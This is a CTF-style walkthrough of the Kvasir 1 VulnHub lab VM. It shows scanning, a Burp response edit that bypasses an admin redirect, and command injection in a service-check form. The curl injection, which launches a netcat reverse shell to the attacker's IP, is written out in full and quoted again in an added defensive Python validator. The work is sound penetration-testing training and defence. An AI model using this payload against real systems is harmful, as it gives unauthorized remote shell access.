Penetration testing

Kvasir 1 VM Walkthrough

June 14, 2017 by Hashim Shaikh

Kvasir 1 is a vulnerable VM hosted by vulnhub.com. Rasta Mouse created the challenge. It can be downloaded from the URL https://www.vulnhub.com/entry/kvasir-i,106/

It is a Linux virtual machine distributed in OVA format.

Environment:

  1. Attacker Machine is Kali Linux 192.168.44.136
  2. Victim Kvasir 192.168.44.129

When you start the Kvasir VM, it will look something like the following:

Debian GNU/Linux 7 kvasir tty1

Kvasir Login:

Let us run an nmap aggressive and version scan on the target VM with the following command:

# nmap -A -sV 192.168.44.129

The Nmap results show that only port 80/tcp is open, serving HTTP from an Apache httpd 2.2.22 (Debian) installation.

Now let us visit the site by entering the following in the URL:

http://192.168.44.129

As seen below a login page will appear.

Now let us run a Nikto scan in parallel.

The command used for website scanning with Nikto is:

# nikto -h http://192.168.44.129

Also, let us run a directory brute-force scan in parallel.

The following command is used for enumerating the directories on Kvasir:

# dirb http://192.168.44.129

By analyzing the output, we can make out that we have to consider the following URL for testing:

http://192.168.44.129/admin.php

http://192.168.44.129/index.php

Let us visit the admin page first. The page responds with a 302 redirect, which can be seen in Burp Suite.

As we would like to see admin.php in our browser, we request http://192.168.44.129/admin.php from the server.

Response from the server:

Now edit the status code from 302 to 200, as shown below.

After changing the response, forward it to the browser, and you will see the following page:

The service check instruction looks like a good candidate for command injection, since the status of a service can be found by executing the following command in the terminal:

service apache2 status

Assuming our input will be executed on the terminal, we can try command injection.

Well, I tried a few syntaxes and a few commands, but the commands failed.

Composing the correct syntax was a somewhat difficult task.

The following command was able to give me shell access:

# curl --data "service=ssh; netcat -e /bin/bash 192.168.44.136 1234; id #&submit=Submit" http://192.168.44.129/admin.php

A listener was set up on port 1234 for any incoming connection.

The command used was:

# nc -lvvp 1234

Finally, I got the shell.
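Seen from the defender's side, the service check is exploitable because the form value reaches a shell command line. The following is an added example, not code from the original walkthrough or from the VM: it assumes the handler runs `service <name> status`, and the allowlist and function names are hypothetical. It validates the field and builds an argv list that is never parsed by a shell.

```python
import re
import subprocess
from urllib.parse import parse_qs

# Assumed allowlist of services the admin page may query (hypothetical values).
ALLOWED_SERVICES = {"apache2", "ssh", "mysql"}
# Shape check applied before the allowlist, so a careless allowlist entry
# cannot reintroduce spaces or shell metacharacters.
SERVICE_NAME = re.compile(r"[a-z0-9][a-z0-9_.-]{0,31}")


def build_status_argv(form_body: str) -> list[str]:
    """Turn a urlencoded POST body into an argv list, or raise ValueError."""
    # Split on '&' only, so ';' stays inside the value instead of hiding part of it.
    fields = parse_qs(form_body, keep_blank_values=True, separator="&")
    values = fields.get("service", [])
    if len(values) != 1:
        raise ValueError("exactly one 'service' field is required")
    name = values[0]
    if not SERVICE_NAME.fullmatch(name) or name not in ALLOWED_SERVICES:
        raise ValueError(f"service not permitted: {name!r}")
    # The name is passed as one argument; no shell ever interprets it.
    return ["service", name, "status"]


def is_permitted(form_body: str) -> bool:
    """True when the request would be executed, False when it is rejected."""
    try:
        build_status_argv(form_body)
    except ValueError:
        return False
    return True


def service_status(form_body: str) -> str:
    """Run the check without a shell; needs a host that has the service command."""
    argv = build_status_argv(form_body)
    done = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=10)
    return done.stdout


# Constructed sample bodies: a normal request and the injection string from the walkthrough.
BENIGN = "service=apache2&submit=Submit"
INJECTED = "service=ssh; netcat -e /bin/bash 192.168.44.136 1234; id #&submit=Submit"
```

Rejected requests are worth logging with the raw field value, since a `;` or `#` in a service name is a strong signal of injection attempts against this form.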


Hashim Shaikh currently works with Aujas Networks. Holding both the OSCP and CEH certifications, he likes exploring Kali Linux. His interests include offensive security, exploitation, privilege escalation and learning new things. His blog can be found here: http://justpentest.blogspot.in and his LinkedIn profile here: https://in.linkedin.com/in/hashim-shaikh-oscp-45b90a48